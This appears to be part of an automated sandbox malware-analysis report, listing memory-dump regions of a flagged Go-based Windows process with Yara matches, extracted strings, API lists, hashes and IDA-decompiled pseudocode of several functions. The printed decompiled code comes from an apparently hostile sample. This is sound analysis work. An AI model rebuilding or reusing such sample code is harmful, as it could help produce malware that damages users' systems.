                                                                                                                            • runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt to non-Go memory , locked to threadArab Standard Tim, xrefs: 01351959, 01351A54
                                                                                                                            • types value=connectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: runningsyscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status AcceptExArmenia, xrefs: 013519DF
                                                                                                                            • not in ranges: untyped locals , not a function0123456789abcdefCreateDirectoryWDnsNameCompare_WDuplicateTokenExFlushFileBuffersGC scavenge waitGC worker (idle)GODEBUG: value "GetComputerNameWGetCurrentThreadGetFullPathNameWGetLongPathNameWImperial_AramaicMero, xrefs: 01351991
                                                                                                                            • runtime: type offset out of rangeslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent lockingtimer period must be non-negativetoo many levels of symbolic linksOther_Default_Ignorable_Code_PointSetFileCompletionNotificatio, xrefs: 01351AB9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: types value=connectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: runningsyscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status AcceptExArmenia$ base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not <-chanArabicBrahmiCarianChakmaCommonCopticGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianRejangSCHED SyriacTai_LeTangutTe$ not in ranges: untyped locals , not a function0123456789abcdefCreateDirectoryWDnsNameCompare_WDuplicateTokenExFlushFileBuffersGC scavenge waitGC worker (idle)GODEBUG: value "GetComputerNameWGetCurrentThreadGetFullPathNameWGetLongPathNameWImperial_AramaicMero$ out of range procedure in to finalizer untyped args -thread limitCertCloseStoreCreateProcessWCryptGenRandomFindFirstFileWFormatMessageWGC assist waitGC worker initGetConsoleModeGetProcAddressGetUserNameExWMB; allocated NetUserGetInfoOther_ID_StartPattern_$runtime: type offset base pointer out of rangesignal arrived during external code executionslice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to pallocChunkBytesP has cached GC work at end of$runtime: type offset out of rangeslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent lockingtimer period must be non-negativetoo many levels of symbolic linksOther_Default_Ignorable_Code_PointSetFileCompletionNotificatio$runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt to non-Go memory , locked to threadArab Standard Tim
                                                                                                                            • API String ID: 0-3946913466
                                                                                                                            • Opcode ID: 85cc3400a3144445944795422dc2c6bfdf3790eb7f66a1497c305b8cadb76c3a
                                                                                                                            • Instruction ID: ecc2eebdef999e3a8efd111ae751f4650f5d5f648b2d487f09e09c808ac7f022
                                                                                                                            • Opcode Fuzzy Hash: 85cc3400a3144445944795422dc2c6bfdf3790eb7f66a1497c305b8cadb76c3a
                                                                                                                            • Instruction Fuzzy Hash: 71514536315B85CAEB24EB58E4803AAB7B4FB98B88F844131EB8D03775DF38C5418754
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free$_errno$_callnewhmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2761444284-0
                                                                                                                            • Opcode ID: 8dc90ca19aaec31e348d566872eeb8a50e4c193b26218b7fab70ade35e01bdf8
                                                                                                                            • Instruction ID: 5c795be894506392cd3015ed175de2a266b6f7c74a535287f08be2d68e70ee98
                                                                                                                            • Opcode Fuzzy Hash: 8dc90ca19aaec31e348d566872eeb8a50e4c193b26218b7fab70ade35e01bdf8
                                                                                                                            • Instruction Fuzzy Hash: 4A41F127300F8297EE569B229D5C2AEA790F705BA2FA44025FE0607F55DF38C427C728
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 69%
                                                                                                                            			E0131EAA0(intOrPtr __ebx, char __ecx, void* __edx, void* __rdx, long long __rbp, void* __r14, long long _a8, intOrPtr _a16, char _a20) {
                                                                                                                            				char _v8;
                                                                                                                            				unsigned int _v16;
                                                                                                                            				long long _v24;
                                                                                                                            				long long _v40;
                                                                                                                            				void* _t25;
                                                                                                                            				intOrPtr _t36;
                                                                                                                            				char _t44;
                                                                                                                            				void* _t46;
                                                                                                                            				signed int _t47;
                                                                                                                            				void* _t50;
                                                                                                                            				void* _t51;
                                                                                                                            				void* _t52;
                                                                                                                            				void* _t53;
                                                                                                                            				void* _t55;
                                                                                                                            				long long _t56;
                                                                                                                            				long long _t59;
                                                                                                                            				long long _t71;
                                                                                                                            				unsigned int _t72;
                                                                                                                            				void* _t74;
                                                                                                                            				long long _t75;
                                                                                                                            				void* _t76;
                                                                                                                            				void* _t80;
                                                                                                                            				void* _t84;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t84 = __r14;
                                                                                                                            					_t77 = __rbp;
                                                                                                                            					_t74 = __rdx;
                                                                                                                            					_t44 = __ecx;
                                                                                                                            					_t36 = __ebx;
                                                                                                                            					if(_t80 <=  *((intOrPtr*)(__r14 + 0x10))) {
                                                                                                                            						goto L13;
                                                                                                                            					}
                                                                                                                            					L1:
                                                                                                                            					_v8 = __rbp;
                                                                                                                            					_t77 =  &_v8;
                                                                                                                            					_t55 =  *0x14a16f0 - _t36; // 0x0
                                                                                                                            					if(_t55 == 0) {
                                                                                                                            						while(1) {
                                                                                                                            							L4:
                                                                                                                            							_t46 =  *_t56;
                                                                                                                            							_t50 = _t46;
                                                                                                                            							asm("btr ecx, 0x1f");
                                                                                                                            							_t44 = _t46 - 1;
                                                                                                                            							asm("o16 nop [eax+eax]");
                                                                                                                            							__eflags = _t44 - 0x80000000;
                                                                                                                            							if(__eflags >= 0) {
                                                                                                                            								break;
                                                                                                                            							}
                                                                                                                            							L5:
                                                                                                                            							_t47 = _t74 - 1;
                                                                                                                            							_t71 = _t56;
                                                                                                                            							_t25 = _t50;
                                                                                                                            							asm("lock cmpxchg [ebx], ecx");
                                                                                                                            							_t48 = _t47 & 0xffffff00 | __eflags == 0x00000000;
                                                                                                                            							if(__eflags == 0) {
                                                                                                                            								L3:
                                                                                                                            								_t56 = _t71;
                                                                                                                            								continue;
                                                                                                                            							}
                                                                                                                            							L6:
                                                                                                                            							__eflags = _t50 - 0x80000000;
                                                                                                                            							if(_t50 != 0x80000000) {
                                                                                                                            								return _t25;
                                                                                                                            							} else {
                                                                                                                            								__eflags =  *0x14cf790;
                                                                                                                            								if( *0x14cf790 > 0) {
                                                                                                                            									_t59 =  *0x14a1718; // 0x0
                                                                                                                            									_v40 = _t59;
                                                                                                                            									_t72 =  *0x14cfcd8; // 0x2b0000
                                                                                                                            									_v16 = _t72;
                                                                                                                            									_t75 =  *0x14a1728; // 0x0
                                                                                                                            									_v24 = _t75;
                                                                                                                            									asm("movsd xmm0, [0x182beb]");
                                                                                                                            									asm("movsd [esp+0x18], xmm0");
                                                                                                                            									E01332340(_t75, _t77, _t84);
                                                                                                                            									E01332C40(_t48, _t51, _t52, _t53, 0x138c439, _t71, _t77, _t84);
                                                                                                                            									E01332940(_t51, _t52, _t53, _v16 >> 0x14, _t72, _t77, _t84);
                                                                                                                            									E01332C40(_t48, _t51, _t52, _t53, 0x138817e, _t71, _t77, _t84);
                                                                                                                            									_t73 = _v24;
                                                                                                                            									__eflags = _v16 - _v24 >> 0x14;
                                                                                                                            									E01332940(_t51, _t52, _t53, _v16 - _v24 >> 0x14, _v24, _t77, _t84);
                                                                                                                            									E01332C40(_t48, _t51, _t52, _t53, 0x138a4be, _t71, _t77, _t84);
                                                                                                                            									E01332940(_t51, _t52, _t53, _v40, _v24, _t77, _t84);
                                                                                                                            									E01332C40(_t48, _t51, _t52, _t53, 0x1387416, _t71, _t77, _t84);
                                                                                                                            									asm("movsd xmm0, [esp+0x18]");
                                                                                                                            									L01332640(_t48, _t51, _t52, _t53, _t71, _t73, _t75, _t76, _t77, _t84);
                                                                                                                            									E01332C40(_t48, _t51, _t52, _t53, 0x1387a94, _t71, _t77, _t84);
                                                                                                                            									_t25 = L013323C0(_t75, _t77, _t84);
                                                                                                                            								}
                                                                                                                            								return _t25;
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            						L11:
                                                                                                                            						E01330BA0(0x138ce97, _t71, _t77);
                                                                                                                            						L12:
                                                                                                                            						_t56 = 0x138e7a9;
                                                                                                                            						_t36 = 0x31;
                                                                                                                            						E01330BA0(0x138e7a9, _t71, _t77);
                                                                                                                            						goto L13;
                                                                                                                            					}
                                                                                                                            					L2:
                                                                                                                            					goto L12;
                                                                                                                            					L13:
                                                                                                                            					_a8 = _t56;
                                                                                                                            					_a16 = _t36;
                                                                                                                            					_a20 = _t44;
                                                                                                                            					E01356200(_t74, _t77);
                                                                                                                            				}
                                                                                                                            			}



























                                                                                                                            Strings
                                                                                                                            • sweeper left outstanding across sweep generationsattempt to execute system stack code on user stackcompileCallback: function argument frame too largemallocgc called with gcphase == _GCmarkterminationrecursive call during initialization - linker skewruntime: un, xrefs: 0131EC0F
                                                                                                                            • pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=, bound = , limit = /dev/stdinBad varintCancelIoExChorasmianCreatePipeDeprecatedDevanagariDnsQuery_WException GC forcedGOMAXPROCSGetIfEntry, xrefs: 0131EBB6
                                                                                                                            • pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limitBidi_ControlGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetStdHandleGetTempPathWJoin_ControlLoadLibraryWMeetei_M, xrefs: 0131EBD2
                                                                                                                            • mismatched begin/end of activeSweepnetwork dropped connection on resetpersistentalloc: align is too largepidleput: P has non-empty run queueruntime: close polldesc w/o unblockruntime: createevent failed; errno=traceback did not unwind completelytransport endpo, xrefs: 0131EBFE
                                                                                                                            • pacer: sweep done at heap size pattern contains path separatorresetspinning: not a spinning mruntime: cannot allocate memoryruntime: failed to commit pagesruntime: split stack overflow: slice bounds out of range [%x:]slice bounds out of range [:%x] (types from, xrefs: 0131EB50
                                                                                                                            • MB; allocated NetUserGetInfoOther_ID_StartPattern_SyntaxProcess32NextWQuotation_MarkRegSetValueExWSetFilePointerTranslateNameWallocfreetracebad allocCountbad restart PCbad span statefile too largefinalizer waitgcstoptheworldgetprotobynameinvalid syntaxis a dir, xrefs: 0131EB73
                                                                                                                            • MB during sweep; swept Marquesas Standard TimeMauritius Standard TimeNoncharacter_Code_PointQyzylorda Standard TimeSetEnvironmentVariableWSingapore Standard TimeSri Lanka Standard TimeTocantins Standard TimeVenezuela Standard TimeVolgograd Standard TimeW. Euro, xrefs: 0131EB9B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • API String ID: 0-180825167
                                                                                                                            • Opcode ID: 771c4df9fa522db5d527c3879d7c3a13a9df7c27c15ba6ea30766c6e5a70ffe5
                                                                                                                            • Instruction ID: e9348b061fe42b9caa381da6d7c1fd15142ead841e8f817a2e3d17f4f1734fb1
                                                                                                                            • Opcode Fuzzy Hash: 771c4df9fa522db5d527c3879d7c3a13a9df7c27c15ba6ea30766c6e5a70ffe5
                                                                                                                            • Instruction Fuzzy Hash: 64417E36214B85CADB09EB58E48039A7764F798788F845535EE8E07735CF3CC584CB21
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 37%
                                                                                                                            			E0132BB00(void* __ecx, void* __edx, void* __edi, void* __esi, void* __esp, void* __rbx, void* __rsi, long long __rbp, void* __r8, void* __r9, void* __r10, void* __r11, void* __r13, void* __r14) {
                                                                                                                            				char _v8;
                                                                                                                            				void* _v16;
                                                                                                                            				char _v24;
                                                                                                                            				void* _v32;
                                                                                                                            				void* _v40;
                                                                                                                            				void* _v48;
                                                                                                                            				void* _v56;
                                                                                                                            				void* _v64;
                                                                                                                            				void* _v79;
                                                                                                                            				void* _v88;
                                                                                                                            				void* _v96;
                                                                                                                            				void* _v101;
                                                                                                                            				void* _v112;
                                                                                                                            				void* _v120;
                                                                                                                            				void* _v128;
                                                                                                                            				void* _v136;
                                                                                                                            				void* _v144;
                                                                                                                            				void* _t37;
                                                                                                                            				void* _t55;
                                                                                                                            				void* _t67;
                                                                                                                            				void* _t74;
                                                                                                                            				void* _t75;
                                                                                                                            				void* _t79;
                                                                                                                            				void* _t81;
                                                                                                                            				void* _t82;
                                                                                                                            				void* _t84;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t84 = __r13;
                                                                                                                            					_t82 = __r11;
                                                                                                                            					_t81 = __r10;
                                                                                                                            					_t79 = __r8;
                                                                                                                            					_t67 = __rsi;
                                                                                                                            					_t37 = __ecx;
                                                                                                                            					if( &_v24 >  *((intOrPtr*)(__r14 + 0x10))) {
                                                                                                                            						break;
                                                                                                                            					}
                                                                                                                            					L20:
                                                                                                                            					E01356200(_t55, __rbp);
                                                                                                                            				}
                                                                                                                            				L1:
                                                                                                                            				_t75 = _t74 - 0x98;
                                                                                                                            				_v8 = __rbp;
                                                                                                                            			}

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: PowerReg$gisterSu$ication$powrprof$rof.dll$spendRes$umeNotif
                                                                                                                            • API String ID: 0-941992356
                                                                                                                            • Opcode ID: b514445300c5a3b3aca6a48b8e55db33b582dec6ce4bbfbeab8a075d64dc95d8
                                                                                                                            • Instruction ID: a11d3db25db187a85222d77b44635bb0cc8af499f4bcad3e2a8e391907b3823d
                                                                                                                            • Opcode Fuzzy Hash: b514445300c5a3b3aca6a48b8e55db33b582dec6ce4bbfbeab8a075d64dc95d8
                                                                                                                            • Instruction Fuzzy Hash: 433116B6608B9085DB20DB21F44039AB7A5F789BC4F988125EBDC47B6EDF38C154CB40
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 65%
                                                                                                                            			E0000025B25BF8A6BE74(long long __rax, long long __rbx, void* __rsi, long long _a8, long long _a16, long long _a24, long long _a32) {
                                                                                                                            				long long _v72;
                                                                                                                            				intOrPtr _v88;
                                                                                                                            				void* __rdi;
                                                                                                                            				void* __rbp;
                                                                                                                            				void* __r14;
                                                                                                                            				signed short _t52;
                                                                                                                            				signed int _t53;
                                                                                                                            				intOrPtr _t58;
                                                                                                                            				void* _t59;
                                                                                                                            				void* _t60;
                                                                                                                            				signed short _t61;
                                                                                                                            				void* _t78;
                                                                                                                            				void* _t95;
                                                                                                                            				void* _t105;
                                                                                                                            				signed int _t129;
                                                                                                                            				signed int _t130;
                                                                                                                            				signed int _t152;
                                                                                                                            				void* _t163;
                                                                                                                            				void* _t166;
                                                                                                                            				void* _t168;
                                                                                                                            				void* _t174;
                                                                                                                            				long long _t185;
                                                                                                                            				long long _t187;
                                                                                                                            				long long _t189;
                                                                                                                            				long long _t212;
                                                                                                                            				void* _t215;
                                                                                                                            				void* _t217;
                                                                                                                            				void* _t219;
                                                                                                                            				long long _t222;
                                                                                                                            				long long _t223;
                                                                                                                            				void* _t226;
                                                                                                                            				void* _t228;
                                                                                                                            				void* _t234;
                                                                                                                            				void* _t246;
                                                                                                                            				void* _t248;
                                                                                                                            				int _t250;
                                                                                                                            				long long _t251;
                                                                                                                            				int _t253;
                                                                                                                            
                                                                                                                            				_t185 = __rax;
                                                                                                                            				_a8 = __rbx;
                                                                                                                            				E0000025B25BF8A73124(0x280, _t163, __rax, __rbx, __rsi, _t226);
                                                                                                                            				_t187 = _t185;
                                                                                                                            				E0000025B25BF8A73278(0x100, _t185);
                                                                                                                            				_a24 = _t185;
                                                                                                                            				E0000025B25BF8A73278(0x100, _t187);
                                                                                                                            				E0000025B25BF8A73278(0x80, _t187);
                                                                                                                            				r12d = 0;
                                                                                                                            				_t3 = _t246 + 8; // 0x8
                                                                                                                            				E0000025B25BF8A77A30(_t3, _t166, _t185, _t215);
                                                                                                                            				_t4 = _t246 + 0x43; // 0x43
                                                                                                                            				_a32 = _t185;
                                                                                                                            				E0000025B25BF8A77A64(_t4, _t166);
                                                                                                                            				_t6 = _t246 + 0x44; // 0x44
                                                                                                                            				E0000025B25BF8A779DC(_t6, _t166);
                                                                                                                            				_t7 = _t246 + 0x45; // 0x45
                                                                                                                            				E0000025B25BF8A779DC(_t7, _t166);
                                                                                                                            				_t8 = _t187 + 1; // 0x46
                                                                                                                            				E0000025B25BF8A779DC(_t8, _t166);
                                                                                                                            				_t9 = _t187 - 0x44; // 0x1
                                                                                                                            				E0000025B25BF8A77A64(_t9, _t166);
                                                                                                                            				_t10 = _t187 - 0x43; // 0x2
                                                                                                                            				_t52 = E0000025B25BF8A77A64(_t10, _t166);
                                                                                                                            				_t11 = _t187 - 0x42; // 0x3
                                                                                                                            				r13d = _t52 & 0x0000ffff;
                                                                                                                            				_t53 = E0000025B25BF8A779DC(_t11, _t166);
                                                                                                                            				_t12 = _t187 - 0x32; // 0x13
                                                                                                                            				E0000025B25BF8A779DC(_t12, _t166);
                                                                                                                            				_t13 = _t187 - 0x3c; // 0x9
                                                                                                                            				E0000025B25BF8A77A30(_t13, _t166, _t185, _t215);
                                                                                                                            				_t14 = _t187 - 0x3b; // 0xa
                                                                                                                            				_a16 = _t185;
                                                                                                                            				E0000025B25BF8A77A30(_t14, _t166, _t185, _t215);
                                                                                                                            				_v72 = _t185;
                                                                                                                            				malloc(_t253);
                                                                                                                            				_t251 = _t185;
                                                                                                                            				_t58 = E0000025B25BF8A779DC(_t7, _t166);
                                                                                                                            				_t164 = _t58;
                                                                                                                            				_t59 = E0000025B25BF8A779DC(_t8, _t166);
                                                                                                                            				_t18 = _t187 - 1; // 0x44
                                                                                                                            				_t60 = E0000025B25BF8A779DC(_t18, _t166);
                                                                                                                            				_t19 = _t246 + 0x43; // 0x43
                                                                                                                            				_t61 = E0000025B25BF8A77A64(_t19, _t166);
                                                                                                                            				r9d = _t59;
                                                                                                                            				r8d = _t60;
                                                                                                                            				_v88 = _t58;
                                                                                                                            				E0000025B25BF8A783C4(_t61 & 0x0000ffff, _t251);
                                                                                                                            				if (E0000025B25BF8A6DA14(_t187) == 0) goto 0xf8a6bf9d;
                                                                                                                            				E0000025B25BF8A78504();
                                                                                                                            				 *0xf8a9b400 = _t53;
                                                                                                                            				 *0xf8a9d868 = E0000025B25BF8A77A64(5, E0000025B25BF8A6DA14(_t187)) & 0x0000ffff;
                                                                                                                            				E0000025B25BF8A779DC(4, E0000025B25BF8A6DA14(_t187));
                                                                                                                            				malloc(_t250);
                                                                                                                            				_t218 = _t185;
                                                                                                                            				E0000025B25BF8A72D94(E0000025B25BF8A779DC(4, E0000025B25BF8A6DA14(_t187)), _t68, _t185, _t187, _t185, _t215, _t234);
                                                                                                                            				_t168 =  *0xf8a9b400 - r12d; // 0x2e2e2e2e
                                                                                                                            				if (_t168 <= 0) goto 0xf8a6c1b3;
                                                                                                                            				_t222 = _a16;
                                                                                                                            				_t227 = _a24;
                                                                                                                            				E0000025B25BF8A77FC4(r12d, _t187, _a32, _t185, _t222, _a24, _t251, _t248, _t246);
                                                                                                                            				E0000025B25BF8A794CC(4, 4, _t185, _t185, _t215, 0xf8a8bac4, _t185, _t217);
                                                                                                                            				r12d = 0;
                                                                                                                            				E0000025B25BF8A77FC4(0, _t187, _a32, _t185, _t222, _a24, _t251, __rsi, _t226);
                                                                                                                            				E0000025B25BF8A794CC(4, 4, _t185, _a24, _t215, 0xf8a8bac4, _t185);
                                                                                                                            				 *0xf8a9b404 = 1;
                                                                                                                            				E0000025B25BF8A794CC(4, 4, _t185, 0xf8aa6f80, _t215, 0xf8a8bac4, _v72);
                                                                                                                            				E0000025B25BF8A6D3EC(r13d, _t187, _t185, _t185, _t222, _t222);
                                                                                                                            				_t26 = _t246 + 4; // 0x4
                                                                                                                            				r9d = E0000025B25BF8A779DC(_t26, _t168);
                                                                                                                            				if (E0000025B25BF8A6D398(_t187, _a24, 0xf8aa6b40, _t222, _a24, _t218) <= 0) goto 0xf8a6c0c4;
                                                                                                                            				_t78 = E0000025B25BF8A77574(_t77, _t59, _t187, _t218, _t222, _t227);
                                                                                                                            				if (_t78 <= 0) goto 0xf8a6c0c4;
                                                                                                                            				E0000025B25BF8A7597C(_t78, _t78, _t187, _t218, _t222, _t227);
                                                                                                                            				if (_t78 == 0xffffffff) goto 0xf8a6c148;
                                                                                                                            				E0000025B25BF8A73A2C(_t78, _t185, E0000025B25BF8A6C1D8, E0000025B25BF8A6C1D8);
                                                                                                                            				if (E0000025B25BF8A779DC(0x1c, _t78 - 0xffffffff) == 0) goto 0xf8a6c0f3;
                                                                                                                            				E0000025B25BF8A6F5A0(0x1000, E0000025B25BF8A6C1D8, E0000025B25BF8A6C1D8, _t222, _t227);
                                                                                                                            				E0000025B25BF8A72270(E0000025B25BF8A6C1D8, E0000025B25BF8A6C1D8, 0xf8aa6b40);
                                                                                                                            				E0000025B25BF8A71CFC(0x80000, _t53, _t185, E0000025B25BF8A6C1D8, E0000025B25BF8A6C1D8, _t222, _t227);
                                                                                                                            				if (E0000025B25BF8A6DA14(E0000025B25BF8A6C1D8) == 0) goto 0xf8a6c11e;
                                                                                                                            				E0000025B25BF8A6DAAC();
                                                                                                                            				_t174 =  *0xf8a9d888 - r12d; // 0xd878
                                                                                                                            				if (_t174 <= 0) goto 0xf8a6c14e;
                                                                                                                            				E0000025B25BF8A6D36C(E0000025B25BF8A6C1D8, 0xf8aa6b40, _t222, _t227, _t218);
                                                                                                                            				_t242 = _t222;
                                                                                                                            				E0000025B25BF8A6D3EC(r13d, E0000025B25BF8A6C1D8, _t185, _t218, _t222, _t222);
                                                                                                                            				E0000025B25BF8A6D5A0(_t78, E0000025B25BF8A6C1D8, 0xf8aa6f80, 0xf8aa6b40, _t218, _t251);
                                                                                                                            				goto 0xf8a6c14e;
                                                                                                                            				r12d = 1;
                                                                                                                            				E0000025B25BF8A6D36C(E0000025B25BF8A6C1D8, 0xf8aa6b40, _t222, _t227, _t222);
                                                                                                                            				if (E0000025B25BF8A6DA14(E0000025B25BF8A6C1D8) == 0) goto 0xf8a6c161;
                                                                                                                            				E0000025B25BF8A78504();
                                                                                                                            				_t129 =  *0xf8a9b400; // 0x2e2e2e2e
                                                                                                                            				if (_t129 == 0) goto 0xf8a6c1b3;
                                                                                                                            				_t152 =  *0xf8a9d868; // 0xd816
                                                                                                                            				if (_t152 == 0) goto 0xf8a6c1a1;
                                                                                                                            				if (0x51eb851f * _t152 * _t129 >> 0x20 >> 5 == 0) goto 0xf8a6c199;
                                                                                                                            				E0000025B25BF8A6D9F4(_t222);
                                                                                                                            				_t130 =  *0xf8a9b400; // 0x2e2e2e2e
                                                                                                                            				goto 0xf8a6c19b;
                                                                                                                            				if (0 - _t130 >= 0) goto 0xf8a6c1a1;
                                                                                                                            				0xf8a6fdf8();
                                                                                                                            				_t180 =  *0xf8a9b400;
                                                                                                                            				if ( *0xf8a9b400 > 0) goto 0xf8a6bffa;
                                                                                                                            				_t212 = _t251;
                                                                                                                            				free(??);
                                                                                                                            				_t189 = _a8;
                                                                                                                            				_pop(_t219);
                                                                                                                            				_pop(_t223);
                                                                                                                            				_pop(_t228);
                                                                                                                            				goto E0000025B25BF8A78504;
                                                                                                                            				asm("int3");
                                                                                                                            				_a8 = _t189;
                                                                                                                            				_a16 = _t223;
                                                                                                                            				_t105 = r8d;
                                                                                                                            				_t95 = E0000025B25BF8A779DC(0x1c, _t180);
                                                                                                                            				if ( *0xf8a9b404 != 1) goto 0xf8a6c21c;
                                                                                                                            				if ((0 | _t95 != 0x00000000) == 0) goto 0xf8a6c21c;
                                                                                                                            				r8d = _t105;
                                                                                                                            				E0000025B25BF8A6CDF4(0, _t164, _t189, _t212, _t212, _t228, _t242, _t219);
                                                                                                                            				goto 0xf8a6c22c;
                                                                                                                            				r9d = 0;
                                                                                                                            				r8d = _t105;
                                                                                                                            				return E0000025B25BF8A6C23C(_t185, _t189);
                                                                                                                            			}










































                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _snprintfmalloc$_errno$_callnewhfree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2229704131-0
                                                                                                                            • Opcode ID: 8eecdb483356f0b954d4a36b27d0a4f662cf21316c9e1d202b28ef47dae9652c
                                                                                                                            • Instruction ID: 0ba3a3b9b4cce2b7564613c5a0813368b66a4168edcf13156bdb359b9e45bf60
                                                                                                                            • Opcode Fuzzy Hash: 8eecdb483356f0b954d4a36b27d0a4f662cf21316c9e1d202b28ef47dae9652c
                                                                                                                            • Instruction Fuzzy Hash: 45919D23300E414AFF46EB619C5D7AD2291EB85BA2F745025BD0A47FCBDF38C50697A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$_invalid_parameter_noinfo$fseekmalloc$AllocateHeap_callnewh_fseek_nolock_ftelli64fclose
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 495604859-0
                                                                                                                            • Opcode ID: 79c507d9139c9cf0746154fa585ea5d11ca0be58d27818409f8204e11e5a27bf
                                                                                                                            • Instruction ID: aff91bf4e97bdf054c413b0f73bebd748d0eed03fee45ef7adbbef1e897019e7
                                                                                                                            • Opcode Fuzzy Hash: 79c507d9139c9cf0746154fa585ea5d11ca0be58d27818409f8204e11e5a27bf
                                                                                                                            • Instruction Fuzzy Hash: 0751C632618E084FEB4AEB289C497B972D1E789321F60426DF44BC36E7DF34D9028795
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _lock$_calloc_crt_mtinitlocknum
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3962633935-0
                                                                                                                            • Opcode ID: 6a91c322c2208c0cc5917e027d28c1d38802243c18a0c81e6fca9182852f44ec
                                                                                                                            • Instruction ID: 480075a9823e2b5159944602787227d378f933b20e03d0caa689ca562a2d6643
                                                                                                                            • Opcode Fuzzy Hash: 6a91c322c2208c0cc5917e027d28c1d38802243c18a0c81e6fca9182852f44ec
                                                                                                                            • Instruction Fuzzy Hash: 47511632519F084FEB159F18CC893B5B7D1FB58321F25019DF88AC72A2D774D942CA9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free$_errno$_callnewhmalloc$AllocateHeap

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
